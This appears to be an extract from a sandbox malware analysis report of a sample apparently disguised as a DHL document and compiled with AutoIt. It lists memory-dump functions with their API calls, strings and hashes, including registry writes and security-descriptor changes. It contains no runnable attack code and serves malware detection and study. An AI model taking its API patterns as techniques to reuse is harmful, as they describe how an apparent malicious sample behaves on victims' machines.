Opcode Fuzzy Hash: dbb563c1a0d3e6382d91960fedb2378aa650cea5d7f26b1e76c4697acf8be0fd
Instruction Fuzzy Hash: 04B18B71604341AFD700DF64C985B6ABBE4FF84351F00891CFA9AAB2A1C771E849DB91

Function 00ED8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED8968
GetSystemMetrics.USER32(00000007), ref: 00ED8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED899B
GetSystemMetrics.USER32(00000008), ref: 00ED89A3
GetSystemMetrics.USER32(00000004), ref: 00ED89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ED89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00ED89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ED8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ED8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00ED8A5A
GetStockObject.GDI32(00000011), ref: 00ED8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED8A81

Part of subcall function 00ED912D: GetCursorPos.USER32(?), ref: 00ED9141
Part of subcall function 00ED912D: ScreenToClient.USER32(00000000,?), ref: 00ED915E
Part of subcall function 00ED912D: GetAsyncKeyState.USER32(00000001), ref: 00ED9183
Part of subcall function 00ED912D: GetAsyncKeyState.USER32(00000002), ref: 00ED919D

SetTimer.USER32(00000000,00000000,00000028,00ED90FC), ref: 00ED8AA8

Strings

AutoIt v3 GUI, xrefs: 00ED8A20

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 77dea810770ea2be604cf681ad09e03f331f61820996221e016322f625a89feb
Instruction ID: 283d342e9cffec708f63a2d57fbf972e9a261dc498088b75dabf02021105e389
Opcode Fuzzy Hash: 77dea810770ea2be604cf681ad09e03f331f61820996221e016322f625a89feb
Instruction Fuzzy Hash: 56B16E75A0030A9FDB14DFA8CD55BEE3BB5FB48315F10422AFA16E7290DB34A941EB50

Function 00F20D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F21114
Part of subcall function 00F210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21120
Part of subcall function 00F210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F2112F
Part of subcall function 00F210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21136
Part of subcall function 00F210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F2114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F20DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F20E29
GetLengthSid.ADVAPI32(?), ref: 00F20E40
GetAce.ADVAPI32(?,00000000,?), ref: 00F20E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F20E96
GetLengthSid.ADVAPI32(?), ref: 00F20EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F20EB5
HeapAlloc.KERNEL32(00000000), ref: 00F20EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F20EDD
CopySid.ADVAPI32(00000000), ref: 00F20EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F20F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F20F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F20F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20F6E
HeapFree.KERNEL32(00000000), ref: 00F20F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20F7E
HeapFree.KERNEL32(00000000), ref: 00F20F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20F8E
HeapFree.KERNEL32(00000000), ref: 00F20F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00F20FA1
HeapFree.KERNEL32(00000000), ref: 00F20FA8

Part of subcall function 00F21193: GetProcessHeap.KERNEL32(00000008,00F20BB1,?,00000000,?,00F20BB1,?), ref: 00F211A1
Part of subcall function 00F21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F20BB1,?), ref: 00F211A8
Part of subcall function 00F21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F20BB1,?), ref: 00F211B7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 0ffaadbff2934bd9376fa662cd6aa195b6e097009296c9403630acd8bdec04af
Instruction ID: 3da9a2192d8327addd9dfced14909339289ef96e8d10d82584393fa52ef0d30a
Opcode Fuzzy Hash: 0ffaadbff2934bd9376fa662cd6aa195b6e097009296c9403630acd8bdec04af
Instruction Fuzzy Hash: 22715C7290031AAFDF209FA5ED44FAEBBB8FF04311F144115FA19E6192DB719905DBA0

Function 00F4C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5CC08,00000000,?,00000000,?,?), ref: 00F4C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F4C5A4
_wcslen.LIBCMT ref: 00F4C5F4
_wcslen.LIBCMT ref: 00F4C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F4C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F4C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F4C84D
RegCloseKey.ADVAPI32(?), ref: 00F4C881
RegCloseKey.ADVAPI32(00000000), ref: 00F4C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F4C960

Strings

REG_SZ, xrefs: 00F4C644
REG_EXPAND_SZ, xrefs: 00F4C5CD
REG_QWORD, xrefs: 00F4C8C3
REG_DWORD, xrefs: 00F4C804
REG_MULTI_SZ, xrefs: 00F4C6F5
REG_BINARY, xrefs: 00F4C913

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 3b0c91a7b9ce7efb6f30c83eb29b556e600f27d79e28f3734287792ae70530cc
Instruction ID: 2ae7ab1c0eb1a9f8bf5395fab3fc3d0807ae2ef0b106f8f7a54399dd0cd8af4c
Opcode Fuzzy Hash: 3b0c91a7b9ce7efb6f30c83eb29b556e600f27d79e28f3734287792ae70530cc
Instruction Fuzzy Hash: 53125A356042019FD754DF14C981F2ABBE5EF88724F14985CF89AAB3A2DB31ED42DB81

Function 00F5091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F509C6
_wcslen.LIBCMT ref: 00F50A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F50A54
_wcslen.LIBCMT ref: 00F50A8A
_wcslen.LIBCMT ref: 00F50B06
_wcslen.LIBCMT ref: 00F50B81

Part of subcall function 00EDF9F2: _wcslen.LIBCMT ref: 00EDF9FD

Part of subcall function 00F22BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F22BFA

Strings

SELECT, xrefs: 00F50D11
GETSELECTED, xrefs: 00F50C4E
COLLAPSE, xrefs: 00F50B01, 00F50B1C
EXISTS, xrefs: 00F50B7C, 00F50B97
GETITEMCOUNT, xrefs: 00F50C1E
ISCHECKED, xrefs: 00F50CE1
EXPAND, xrefs: 00F50BF8
GETTEXT, xrefs: 00F50C97
GETTOTALCOUNT, xrefs: 00F509F2, 00F50A17
UNCHECK, xrefs: 00F50D3E
CHECK, xrefs: 00F50A85, 00F50AA0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: bb8ad66f55687b88b881bc0dc40a9a1fe36fc11794f4fd824610a46f705855a2
Instruction ID: d29e3216f3743b5b688d4b599bf278f45af32ef8b57859fa70d87a0ac1d71cf0
Opcode Fuzzy Hash: bb8ad66f55687b88b881bc0dc40a9a1fe36fc11794f4fd824610a46f705855a2
Instruction Fuzzy Hash: 1BE1A1326083019FC714EF24C490A6AB7E2FFD4315B14495DF996AB362DB31ED4AEB81

Function 00F4C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4B6AE,?,?), ref: 00F4C9B5
_wcslen.LIBCMT ref: 00F4C9F1
_wcslen.LIBCMT ref: 00F4CA68
_wcslen.LIBCMT ref: 00F4CA9E
_wcslen.LIBCMT ref: 00F4CAF9
_wcslen.LIBCMT ref: 00F4CB2F
_wcslen.LIBCMT ref: 00F4CB7F

Strings

HKLM, xrefs: 00F4CA98, 00F4CA9D
HKCR, xrefs: 00F4CB29, 00F4CB2E
HKEY_LOCAL_MACHINE, xrefs: 00F4CA62, 00F4CA67
HKCC, xrefs: 00F4CBAC
HKEY_CURRENT_CONFIG, xrefs: 00F4CB79, 00F4CB7E
HKEY_USERS, xrefs: 00F4CBDF
HKCU, xrefs: 00F4CBCE
HKU, xrefs: 00F4CBF0
HKEY_CURRENT_USER, xrefs: 00F4CBBD
HKEY_CLASSES_ROOT, xrefs: 00F4CAF3, 00F4CAF8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 37cb06c1414e7a67947495700cfe6e644b3b44f2590690d1af6b55054985b1ac
Instruction ID: edc485ed2f2b7a44d1da2cd63821ecbeccb2445c03ce509c6ec7c1848cd00a18
Opcode Fuzzy Hash: 37cb06c1414e7a67947495700cfe6e644b3b44f2590690d1af6b55054985b1ac
Instruction Fuzzy Hash: F7714833E0116A8BCB10EE7CC9516BF3B91EFA0764B212528FC56A7281EA35CD45E3D0

Function 00F5833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F5835A
_wcslen.LIBCMT ref: 00F5836E
_wcslen.LIBCMT ref: 00F58391
_wcslen.LIBCMT ref: 00F583B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F583F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F5361A,?), ref: 00F5844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F58487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F584CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F58501
FreeLibrary.KERNEL32(?), ref: 00F5850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5851D
DestroyIcon.USER32(?), ref: 00F5852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F58549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F58555

Strings

.dll, xrefs: 00F583AB
.icl, xrefs: 00F58368
.exe, xrefs: 00F58388

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 300a192d335b8ec60142ee56764a0498e88331297516f18424a74d695e857c22
Instruction ID: ace2692892ef09148d245907767fbe17b360f594392007619d87646b7ce72058
Opcode Fuzzy Hash: 300a192d335b8ec60142ee56764a0498e88331297516f18424a74d695e857c22
Instruction Fuzzy Hash: E761D071900309BEEB14DF64CC81BBE77A8BF04762F104509FE16E61D1EB75A985EBA0

Function 00EC7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#ce, xrefs: 00EC78ED
#comments-end, xrefs: 00EC78D9
#pragma compile, xrefs: 00EC77D3
Bad directive syntax error, xrefs: 00F0519A
#include-once, xrefs: 00EC782F
#cs, xrefs: 00EC7873, 00EC78C5
", xrefs: 00F05153
#notrayicon, xrefs: 00EC77E7
#comments-start, xrefs: 00EC785F, 00EC78B1
#OnAutoItStartRegister, xrefs: 00EC7817
#requireadmin, xrefs: 00EC77FF
', xrefs: 00F05169
Unterminated group of comments, xrefs: 00F0528C
Cannot parse #include, xrefs: 00F05279
#include, xrefs: 00EC7847

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 5d9ab5e36f71975d88d8725223b37a3c83685e7c8f46be0976402a4310c75172
Instruction ID: fdc7bd34bf26a4262038393b5fb90259365515e71bc9dd8b807a10f2984e15c0
Opcode Fuzzy Hash: 5d9ab5e36f71975d88d8725223b37a3c83685e7c8f46be0976402a4310c75172
Instruction Fuzzy Hash: C481F671A04209BBDB20AF60CE42FAF37A8AF15710F045029FD45BA1D6EB71D916EB91

Function 00F25A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00F25A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F25A40
SetWindowTextW.USER32(?,?), ref: 00F25A57
GetDlgItem.USER32(?,000003EA), ref: 00F25A6C
SetWindowTextW.USER32(00000000,?), ref: 00F25A72
GetDlgItem.USER32(?,000003E9), ref: 00F25A82
SetWindowTextW.USER32(00000000,?), ref: 00F25A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F25AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F25AC3
GetWindowRect.USER32(?,?), ref: 00F25ACC
_wcslen.LIBCMT ref: 00F25B33
SetWindowTextW.USER32(?,?), ref: 00F25B6F
GetDesktopWindow.USER32 ref: 00F25B75
GetWindowRect.USER32(00000000), ref: 00F25B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F25BD3
GetClientRect.USER32(?,?), ref: 00F25BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00F25C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F25C2F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: dd687e3e30023387aeb52e741faf729b69b52b4ebbdef0e148c58901d8ce3c6d
Instruction ID: 367d94c50f89f3651bb0e6b68fd79cdb473fc3b8fd620ff82353d9e9347fae72
Opcode Fuzzy Hash: dd687e3e30023387aeb52e741faf729b69b52b4ebbdef0e148c58901d8ce3c6d
Instruction Fuzzy Hash: FA719C31900B19AFCB20DFA8DE85BAEBBF5FF48B15F104518E146A25A0D774E944EF50

Function 00EE00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00EE00C6

Part of subcall function 00EE00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00F9070C,00000FA0,FCC74CB3,?,?,?,?,00F023B3,000000FF), ref: 00EE011C
Part of subcall function 00EE00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F023B3,000000FF), ref: 00EE0127
Part of subcall function 00EE00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F023B3,000000FF), ref: 00EE0138
Part of subcall function 00EE00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00EE014E
Part of subcall function 00EE00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00EE015C
Part of subcall function 00EE00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00EE016A
Part of subcall function 00EE00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EE0195
Part of subcall function 00EE00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EE01A0

___scrt_fastfail.LIBCMT ref: 00EE00E7

Part of subcall function 00EE00A3: __onexit.LIBCMT ref: 00EE00A9

Strings

SleepConditionVariableCS, xrefs: 00EE0154
kernel32.dll, xrefs: 00EE0133
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00EE0122
InitializeConditionVariable, xrefs: 00EE0148
WakeAllConditionVariable, xrefs: 00EE0162

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 815fc25d5d5fd474ee7df09b4f07227ae580b2f495ef717b6bad9ce8289e7a22
Instruction ID: f4441e7834b56f2b985a46906f87ad0e65fa7b7613184cdb69098fd3a4cd3929
Opcode Fuzzy Hash: 815fc25d5d5fd474ee7df09b4f07227ae580b2f495ef717b6bad9ce8289e7a22
Instruction Fuzzy Hash: AB21293264575D6FE7105BB5AC05B6A33E4DB05B66F001126FE02F72D1DFB09C40AAD2

Function 00F230F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F2318D
_wcslen.LIBCMT ref: 00F231F8

Strings

CLASSNN, xrefs: 00F231F3, 00F23204
TEXT, xrefs: 00F2347C
INSTANCE, xrefs: 00F23453
REGEXPCLASS, xrefs: 00F23255, 00F23266
NAME, xrefs: 00F23335, 00F23346
CLASS, xrefs: 00F23188, 00F231A5

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 7f9c601b6eef35ee277ff06fc4654751f690ef7efdf96e9ecf5735ee88f71f33
Instruction ID: 6e17817096943224ab1ef3305ffe2d1177e22e8b65c9b9302ecc02515ec024fe
Opcode Fuzzy Hash: 7f9c601b6eef35ee277ff06fc4654751f690ef7efdf96e9ecf5735ee88f71f33
Instruction Fuzzy Hash: 41E1F5B2E005369BCB18DFB4D452BEDBBB0BF54720F54811AE456B7240DB34AF85A790

Function 00F344C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00F5CC08), ref: 00F34527
_wcslen.LIBCMT ref: 00F3453B
_wcslen.LIBCMT ref: 00F34599
_wcslen.LIBCMT ref: 00F345F4
_wcslen.LIBCMT ref: 00F3463F
_wcslen.LIBCMT ref: 00F346A7

Part of subcall function 00EDF9F2: _wcslen.LIBCMT ref: 00EDF9FD

GetDriveTypeW.KERNEL32(?,00F86BF0,00000061), ref: 00F34743

Strings

all, xrefs: 00F34531, 00F34536
ramdisk, xrefs: 00F346F1
fixed, xrefs: 00F34635, 00F3463A
network, xrefs: 00F3469D, 00F346A2
cdrom, xrefs: 00F3458F, 00F34594
unknown, xrefs: 00F34708
removable, xrefs: 00F345EA, 00F345EF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 45279e7439d974c18d474f946563ac10e09f72bce4364f0d7cc907f1d29650bc
Instruction ID: a84810630e66d4f0255163ba32999f745cb0ebc412cc153fc2c02dfcc42a83bf
Opcode Fuzzy Hash: 45279e7439d974c18d474f946563ac10e09f72bce4364f0d7cc907f1d29650bc
Instruction Fuzzy Hash: 67B10E71A083029FC310DF28C891A6EB7E5AFA5734F10491DF496D7292E731F845DBA2

Function 00F4AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F4B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4B1D4
_wcslen.LIBCMT ref: 00F4B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4B236
_wcslen.LIBCMT ref: 00F4B332

Part of subcall function 00F305A7: GetStdHandle.KERNEL32(000000F6), ref: 00F305C6

_wcslen.LIBCMT ref: 00F4B34B
_wcslen.LIBCMT ref: 00F4B366
